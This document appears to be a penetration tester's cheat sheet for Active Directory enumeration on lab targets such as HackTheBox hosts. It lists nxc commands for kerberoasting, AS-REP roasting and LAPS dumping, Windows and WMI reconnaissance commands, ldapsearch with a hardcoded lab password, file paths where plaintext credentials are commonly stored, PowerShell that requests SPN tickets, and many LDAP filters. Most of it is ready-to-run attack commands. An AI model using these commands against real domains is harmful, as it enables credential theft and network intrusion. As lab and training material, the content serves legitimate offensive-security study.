Domain Enumeration

Crackmapexec:

nxc ldap 10.10.11.187 -u USER -p PASS --kerberoast kerb
nxc ldap 10.10.11.187 -u USER -p PASS --asreproast asp
nxc ldap 10.10.11.187 -u USER -p PASS --trusted-for-delegation --admin --users --groups --password-not-required
nxc ldap 10.10.11.187 -u USER -p PASS -M user-desc
nxc ldap 10.10.11.187 -u USER -p PASS -M MAQ
nxc ldap 10.10.11.187 -u USER -p PASS -M acds
nxc ldap 10.10.11.187 -u USER -p PASS -M laps
nxc ldap 10.10.11.187 -u USER -p PASS -M laps-signing
nxc ldap 10.10.11.187 -u USER -p PASS -M subnets
nxc smb 10.10.11.187 -u USER -p PASS -M bloodhound

Basic enum

# cmd
Net accounts /domain
Net user /domain
Net groups /domain
Net view /domain
Net user /priv

# wmi
wmic process get CSName,Description,ExecutablePath,ProcessId
wmic useraccount list full
wmic netuse list full
wmic qfe get Caption,Description,HotFixId,InstalledOn
wmic startup get Caption,Command,Location,User
# wmi for privesc
## uncommented path
Get-WmiObject -Class Win32_Service | Where-Object { $_.StartMode -eq 'Auto' -and $_.PathName -notlike '*C:\Windows\*' -and $_.PathName -notlike '*"*' } | Select-Object Name, DisplayName, PathName, StartMode
## find highly privileged processes that can be attacked
$owners = @{};Get-WmiObject -Class win32_process | where-object {$_} | ForEach-Object {$Owners[$_.handle] = $_.getowner().user}
## find all paths to services.exec's that have a space in the path and aren't quotes
$VulServices = Get-WmiObject -Class win32_service |  where-object {($_.pathname -ne $null) -and ($_.pathname.trim() -ne "")} | where-object {-not $_.pathname.StartsWith('"')} |Where-object {-not $_.pathname.StartsWith('')}

Domain enum

nltest /dclist:<DOMAIN>
nltest /dsgetdc:<DOMAIN> /pdc
nltest /bdc_query:<DOMAIN>
nltest /server:<DOMAIN> /trusted_domains

ldapsearching:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://dc.support.htb -D 'SUPPORT\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "CN=Users,DC=SUPPORT,DC=HTB" | tee ldap_dc.support.htb.txt

LDAP dump:

ldapdomaindump -u 'DOMAIN\USER' -p 'PASSWORD' FQDN.DOMAIN.COM

Plaintext passwords

C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

Check and pull SPN tickets:

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '*'

Scripting enum

Check connected domain and DC:

[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

Enumerate domain:

$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)

# UPDATE CREDS
$objDomain = New-Object System.DirectoryServices.DirectoryEntry($SearchString, "corp.com\offsec", "lab")
 
# FILTER HERE
$Searcher.filter="(&(samAccountType=805306368)(servicePrincipalName=*))"
 
$Searcher.FindAll()
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop
    }
    Write-Host "------------------------"
}

Filter by:

AD – SPN: (&(samAccountType=805306368)(servicePrincipalName=*))
AD - Computers: (objectCategory=Computer)
AD – Contacts: (objectCategory=contact)
AD - Domain Controllers: (&(objectCategory=Computer) (userAccountControl:1.2.840.113556.1.4.803:=8192))
AD - Exchange Recipients:(mailNickname=*)
AD - Exchange Recipients – hidden: (&(msExchHideFromAddressLists=TRUE)(!objectClass=publicFolder))
AD - Exchange Recipients - with FAX address:(proxyAddresses=FAX:*)
AD - Exchange Servers: (&(objectClass=msExchExchangeServer)(!(objectClass=msExchExchangeServerPolicy)))
AD - Global Catalogs:(&(objectCategory=nTDSDSA)(options:1.2.840.113556.1.4.803:=1))
AD - Groups – empty:(&(objectClass=group)(!member=*))
AD - Groups - security groups:(groupType:1.2.840.113556.1.4.803:=2147483648)
AD - Objects - cant be deleted:(systemFlags:1.2.840.113556.1.4.803:=-2147483648)
AD - Objects - cant be renamed: (systemFlags:1.2.840.113556.1.4.803:=134217728)
AD – Users:(&(objectCategory=person)(objectClass=user))
AD - Users (more effective):(sAMAccountType=805306368)
AD - Users – disabled: (&(sAMAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=2))
AD - Users - dont require password: (&(sAMAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=32))
AD - Users - mail enabled:(&(sAMAccountType=805306368)(mailNickname=*))
AD - Users - password never expires: (&(sAMAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=65536))

LDAP Filters for Novell eDirectory Environments

eDirectory - NetWare Servers: (objectClass=ncpServer)
eDirectory - NetWare Volumes: (objectClass=volume)
eDirectory - ZEN Applications: (objectClass=appApplication)

LDAP Filters for all LDAP Environments (including Active Directory and eDirectory)

LDAP – Groups: (|(objectClass=group)(objectClass=groupOfNames))
LDAP – InetOrgperson: (objectClass=inetOrgPerson)
LDAP – Ous: (objectClass=organizationalUnit)
LDAP – Users: (|(objectClass=inetOrgPerson)(objectClass=user))
LDAP - Users - with Certificates: (&(|(objectClass=inetOrgPerson)(objectClass=user))(userCertificate=*))
LDAP - Users - with Passwords:(&(objectClass=inetOrgPerson)(userPassword=*))
LDAP - Users - without Mailaddress: (&(objectClass=inetOrgPerson)(!(mail=*)))